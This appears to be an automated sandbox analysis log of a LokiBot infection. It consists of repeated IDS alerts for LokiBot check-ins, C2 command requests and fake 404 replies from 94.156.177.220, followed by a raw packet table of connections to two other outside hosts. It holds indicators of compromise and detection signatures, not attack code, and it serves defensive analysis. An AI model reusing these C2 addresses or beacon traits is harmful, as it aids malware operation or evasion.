                                                                                              2024-10-24T21:23:37.743711+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917794.156.177.22080TCP
                                                                                              2024-10-24T21:23:37.743711+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917794.156.177.22080TCP
                                                                                              2024-10-24T21:23:37.750078+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249177TCP
                                                                                              2024-10-24T21:23:37.888749+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917894.156.177.22080TCP
                                                                                              2024-10-24T21:23:37.888749+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917894.156.177.22080TCP
                                                                                              2024-10-24T21:23:37.888749+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917894.156.177.22080TCP
                                                                                              2024-10-24T21:23:38.952622+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917894.156.177.22080TCP
                                                                                              2024-10-24T21:23:38.952622+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917894.156.177.22080TCP
                                                                                              2024-10-24T21:23:38.958628+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249178TCP
                                                                                              2024-10-24T21:23:39.094384+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224917994.156.177.22080TCP
                                                                                              2024-10-24T21:23:39.094384+02002025381ET MALWARE LokiBot Checkin1192.168.2.224917994.156.177.22080TCP
                                                                                              2024-10-24T21:23:39.094384+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224917994.156.177.22080TCP
                                                                                              2024-10-24T21:23:40.186012+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224917994.156.177.22080TCP
                                                                                              2024-10-24T21:23:40.186012+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224917994.156.177.22080TCP
                                                                                              2024-10-24T21:23:40.192064+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249179TCP
                                                                                              2024-10-24T21:23:40.351612+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918094.156.177.22080TCP
                                                                                              2024-10-24T21:23:40.351612+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918094.156.177.22080TCP
                                                                                              2024-10-24T21:23:40.351612+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918094.156.177.22080TCP
                                                                                              2024-10-24T21:23:41.449167+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918094.156.177.22080TCP
                                                                                              2024-10-24T21:23:41.449167+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918094.156.177.22080TCP
                                                                                              2024-10-24T21:23:41.455373+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249180TCP
                                                                                              2024-10-24T21:23:41.637884+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918194.156.177.22080TCP
                                                                                              2024-10-24T21:23:41.637884+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918194.156.177.22080TCP
                                                                                              2024-10-24T21:23:41.637884+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918194.156.177.22080TCP
                                                                                              2024-10-24T21:23:42.717883+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918194.156.177.22080TCP
                                                                                              2024-10-24T21:23:42.717883+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918194.156.177.22080TCP
                                                                                              2024-10-24T21:23:42.724663+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249181TCP
                                                                                              2024-10-24T21:23:42.903713+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918294.156.177.22080TCP
                                                                                              2024-10-24T21:23:42.903713+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918294.156.177.22080TCP
                                                                                              2024-10-24T21:23:42.903713+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918294.156.177.22080TCP
                                                                                              2024-10-24T21:23:43.958201+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918294.156.177.22080TCP
                                                                                              2024-10-24T21:23:43.958201+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918294.156.177.22080TCP
                                                                                              2024-10-24T21:23:43.964080+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249182TCP
                                                                                              2024-10-24T21:23:44.172011+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918394.156.177.22080TCP
                                                                                              2024-10-24T21:23:44.172011+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918394.156.177.22080TCP
                                                                                              2024-10-24T21:23:44.172011+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918394.156.177.22080TCP
                                                                                              2024-10-24T21:23:45.248595+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918394.156.177.22080TCP
                                                                                              2024-10-24T21:23:45.248595+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918394.156.177.22080TCP
                                                                                              2024-10-24T21:23:45.255136+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249183TCP
                                                                                              2024-10-24T21:23:45.422327+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918494.156.177.22080TCP
                                                                                              2024-10-24T21:23:45.422327+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918494.156.177.22080TCP
                                                                                              2024-10-24T21:23:45.422327+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918494.156.177.22080TCP
                                                                                              2024-10-24T21:23:46.621499+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918494.156.177.22080TCP
                                                                                              2024-10-24T21:23:46.621499+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918494.156.177.22080TCP
                                                                                              2024-10-24T21:23:46.858270+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249184TCP
                                                                                              2024-10-24T21:23:46.883325+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918594.156.177.22080TCP
                                                                                              2024-10-24T21:23:46.883325+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918594.156.177.22080TCP
                                                                                              2024-10-24T21:23:46.883325+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918594.156.177.22080TCP
                                                                                              2024-10-24T21:23:47.970542+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918594.156.177.22080TCP
                                                                                              2024-10-24T21:23:47.970542+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918594.156.177.22080TCP
                                                                                              2024-10-24T21:23:47.977146+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249185TCP
                                                                                              2024-10-24T21:23:48.406792+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918694.156.177.22080TCP
                                                                                              2024-10-24T21:23:48.406792+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918694.156.177.22080TCP
                                                                                              2024-10-24T21:23:48.406792+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918694.156.177.22080TCP
                                                                                              2024-10-24T21:23:49.409576+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918694.156.177.22080TCP
                                                                                              2024-10-24T21:23:49.409576+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918694.156.177.22080TCP
                                                                                              2024-10-24T21:23:49.415576+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249186TCP
                                                                                              2024-10-24T21:23:49.566653+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918794.156.177.22080TCP
                                                                                              2024-10-24T21:23:49.566653+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918794.156.177.22080TCP
                                                                                              2024-10-24T21:23:49.566653+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918794.156.177.22080TCP
                                                                                              2024-10-24T21:23:50.569418+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918794.156.177.22080TCP
                                                                                              2024-10-24T21:23:50.569418+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918794.156.177.22080TCP
                                                                                              2024-10-24T21:23:50.575297+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249187TCP
                                                                                              2024-10-24T21:23:50.751878+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918894.156.177.22080TCP
                                                                                              2024-10-24T21:23:50.751878+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918894.156.177.22080TCP
                                                                                              2024-10-24T21:23:50.751878+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918894.156.177.22080TCP
                                                                                              2024-10-24T21:23:51.776491+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918894.156.177.22080TCP
                                                                                              2024-10-24T21:23:51.776491+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918894.156.177.22080TCP
                                                                                              2024-10-24T21:23:51.783242+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249188TCP
                                                                                              2024-10-24T21:23:51.961137+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224918994.156.177.22080TCP
                                                                                              2024-10-24T21:23:51.961137+02002025381ET MALWARE LokiBot Checkin1192.168.2.224918994.156.177.22080TCP
                                                                                              2024-10-24T21:23:51.961137+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224918994.156.177.22080TCP
                                                                                              2024-10-24T21:23:53.031405+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224918994.156.177.22080TCP
                                                                                              2024-10-24T21:23:53.031405+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224918994.156.177.22080TCP
                                                                                              2024-10-24T21:23:53.037216+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249189TCP
                                                                                              2024-10-24T21:23:53.505309+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919094.156.177.22080TCP
                                                                                              2024-10-24T21:23:53.505309+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919094.156.177.22080TCP
                                                                                              2024-10-24T21:23:53.505309+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919094.156.177.22080TCP
                                                                                              2024-10-24T21:23:55.553592+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919094.156.177.22080TCP
                                                                                              2024-10-24T21:23:55.553592+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919094.156.177.22080TCP
                                                                                              2024-10-24T21:23:55.559391+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249190TCP
                                                                                              2024-10-24T21:23:55.726103+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919194.156.177.22080TCP
                                                                                              2024-10-24T21:23:55.726103+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919194.156.177.22080TCP
                                                                                              2024-10-24T21:23:55.726103+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919194.156.177.22080TCP
                                                                                              2024-10-24T21:23:56.808265+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919194.156.177.22080TCP
                                                                                              2024-10-24T21:23:56.808265+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919194.156.177.22080TCP
                                                                                              2024-10-24T21:23:56.814340+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249191TCP
                                                                                              2024-10-24T21:23:56.972372+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919294.156.177.22080TCP
                                                                                              2024-10-24T21:23:56.972372+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919294.156.177.22080TCP
                                                                                              2024-10-24T21:23:56.972372+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919294.156.177.22080TCP
                                                                                              2024-10-24T21:23:59.107069+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919294.156.177.22080TCP
                                                                                              2024-10-24T21:23:59.107069+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919294.156.177.22080TCP
                                                                                              2024-10-24T21:23:59.107737+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249192TCP
                                                                                              2024-10-24T21:23:59.275066+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919394.156.177.22080TCP
                                                                                              2024-10-24T21:23:59.275066+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919394.156.177.22080TCP
                                                                                              2024-10-24T21:23:59.275066+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919394.156.177.22080TCP
                                                                                              2024-10-24T21:24:00.323075+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919394.156.177.22080TCP
                                                                                              2024-10-24T21:24:00.323075+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919394.156.177.22080TCP
                                                                                              2024-10-24T21:24:00.329944+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249193TCP
                                                                                              2024-10-24T21:24:00.662976+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919494.156.177.22080TCP
                                                                                              2024-10-24T21:24:00.662976+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919494.156.177.22080TCP
                                                                                              2024-10-24T21:24:00.662976+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919494.156.177.22080TCP
                                                                                              2024-10-24T21:24:01.787705+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919494.156.177.22080TCP
                                                                                              2024-10-24T21:24:01.787705+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919494.156.177.22080TCP
                                                                                              2024-10-24T21:24:01.793729+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249194TCP
                                                                                              2024-10-24T21:24:01.927481+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919594.156.177.22080TCP
                                                                                              2024-10-24T21:24:01.927481+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919594.156.177.22080TCP
                                                                                              2024-10-24T21:24:01.927481+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919594.156.177.22080TCP
                                                                                              2024-10-24T21:24:03.086401+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919594.156.177.22080TCP
                                                                                              2024-10-24T21:24:03.086401+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919594.156.177.22080TCP
                                                                                              2024-10-24T21:24:03.093210+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249195TCP
                                                                                              2024-10-24T21:24:03.260935+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919694.156.177.22080TCP
                                                                                              2024-10-24T21:24:03.260935+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919694.156.177.22080TCP
                                                                                              2024-10-24T21:24:03.260935+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919694.156.177.22080TCP
                                                                                              2024-10-24T21:24:04.455922+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919694.156.177.22080TCP
                                                                                              2024-10-24T21:24:04.455922+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919694.156.177.22080TCP
                                                                                              2024-10-24T21:24:04.456210+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249196TCP
                                                                                              2024-10-24T21:24:04.916021+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919794.156.177.22080TCP
                                                                                              2024-10-24T21:24:04.916021+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919794.156.177.22080TCP
                                                                                              2024-10-24T21:24:04.916021+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919794.156.177.22080TCP
                                                                                              2024-10-24T21:24:07.129727+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919794.156.177.22080TCP
                                                                                              2024-10-24T21:24:07.129727+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919794.156.177.22080TCP
                                                                                              2024-10-24T21:24:07.135690+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249197TCP
                                                                                              2024-10-24T21:24:07.357975+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919894.156.177.22080TCP
                                                                                              2024-10-24T21:24:07.357975+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919894.156.177.22080TCP
                                                                                              2024-10-24T21:24:07.357975+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919894.156.177.22080TCP
                                                                                              2024-10-24T21:24:08.466124+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919894.156.177.22080TCP
                                                                                              2024-10-24T21:24:08.466124+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919894.156.177.22080TCP
                                                                                              2024-10-24T21:24:08.472218+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249198TCP
                                                                                              2024-10-24T21:24:08.611452+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224919994.156.177.22080TCP
                                                                                              2024-10-24T21:24:08.611452+02002025381ET MALWARE LokiBot Checkin1192.168.2.224919994.156.177.22080TCP
                                                                                              2024-10-24T21:24:08.611452+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224919994.156.177.22080TCP
                                                                                              2024-10-24T21:24:09.780520+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224919994.156.177.22080TCP
                                                                                              2024-10-24T21:24:09.780520+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224919994.156.177.22080TCP
                                                                                              2024-10-24T21:24:09.786399+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249199TCP
                                                                                              2024-10-24T21:24:10.055685+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920094.156.177.22080TCP
                                                                                              2024-10-24T21:24:10.055685+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920094.156.177.22080TCP
                                                                                              2024-10-24T21:24:10.055685+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920094.156.177.22080TCP
                                                                                              2024-10-24T21:24:14.272410+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920094.156.177.22080TCP
                                                                                              2024-10-24T21:24:14.272410+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920094.156.177.22080TCP
                                                                                              2024-10-24T21:24:14.278170+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249200TCP
                                                                                              2024-10-24T21:24:14.427514+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920194.156.177.22080TCP
                                                                                              2024-10-24T21:24:14.427514+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920194.156.177.22080TCP
                                                                                              2024-10-24T21:24:14.427514+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920194.156.177.22080TCP
                                                                                              2024-10-24T21:24:15.557829+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920194.156.177.22080TCP
                                                                                              2024-10-24T21:24:15.557829+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920194.156.177.22080TCP
                                                                                              2024-10-24T21:24:15.563775+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249201TCP
                                                                                              2024-10-24T21:24:15.731889+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920294.156.177.22080TCP
                                                                                              2024-10-24T21:24:15.731889+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920294.156.177.22080TCP
                                                                                              2024-10-24T21:24:15.731889+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920294.156.177.22080TCP
                                                                                              2024-10-24T21:24:16.929590+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920294.156.177.22080TCP
                                                                                              2024-10-24T21:24:16.929590+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920294.156.177.22080TCP
                                                                                              2024-10-24T21:24:16.936123+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249202TCP
                                                                                              2024-10-24T21:24:17.099666+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920394.156.177.22080TCP
                                                                                              2024-10-24T21:24:17.099666+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920394.156.177.22080TCP
                                                                                              2024-10-24T21:24:17.099666+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920394.156.177.22080TCP
                                                                                              2024-10-24T21:24:18.132065+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920394.156.177.22080TCP
                                                                                              2024-10-24T21:24:18.132065+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920394.156.177.22080TCP
                                                                                              2024-10-24T21:24:18.138996+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249203TCP
                                                                                              2024-10-24T21:24:18.288921+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920494.156.177.22080TCP
                                                                                              2024-10-24T21:24:18.288921+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920494.156.177.22080TCP
                                                                                              2024-10-24T21:24:18.288921+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920494.156.177.22080TCP
                                                                                              2024-10-24T21:24:19.432343+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920494.156.177.22080TCP
                                                                                              2024-10-24T21:24:19.432343+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920494.156.177.22080TCP
                                                                                              2024-10-24T21:24:19.438433+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249204TCP
                                                                                              2024-10-24T21:24:19.585023+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.224920594.156.177.22080TCP
                                                                                              2024-10-24T21:24:19.585023+02002025381ET MALWARE LokiBot Checkin1192.168.2.224920594.156.177.22080TCP
                                                                                              2024-10-24T21:24:19.585023+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.224920594.156.177.22080TCP
                                                                                              2024-10-24T21:24:20.593841+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.224920594.156.177.22080TCP
                                                                                              2024-10-24T21:24:20.593841+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.224920594.156.177.22080TCP
                                                                                              2024-10-24T21:24:20.599686+02002025483ET MALWARE LokiBot Fake 404 Response194.156.177.22080192.168.2.2249205TCP
                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Oct 24, 2024 21:22:35.353836060 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:35.353926897 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:35.354038000 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:35.361545086 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:35.361591101 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.532737017 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.532835960 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.540530920 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.540565968 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.541047096 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.541131020 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.736035109 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.783339024 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.983913898 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.984004974 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.984002113 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.984086990 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.985625029 CEST49163443192.168.2.225.159.62.244
                                                                                              Oct 24, 2024 21:22:36.985663891 CEST443491635.159.62.244192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.991358042 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:36.997112989 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:36.997275114 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:36.997385979 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.003087997 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.664978981 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665040016 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665079117 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665113926 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665150881 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665184975 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665220022 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665252924 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665252924 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665252924 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665254116 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665254116 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665254116 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665307045 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665344954 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665360928 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665360928 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665385962 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.665411949 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.665481091 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.671220064 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.671272993 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.671336889 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.671441078 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.671441078 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.671441078 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.710957050 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782351971 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782402992 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782442093 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782504082 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782533884 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782553911 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782555103 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782555103 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782555103 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782568932 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782604933 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782632113 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782632113 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782639980 CEST8049164192.3.176.141192.168.2.22
                                                                                              Oct 24, 2024 21:22:37.782671928 CEST4916480192.168.2.22192.3.176.141
                                                                                              Oct 24, 2024 21:22:37.782680035 CEST8049164192.3.176.141192.168.2.22
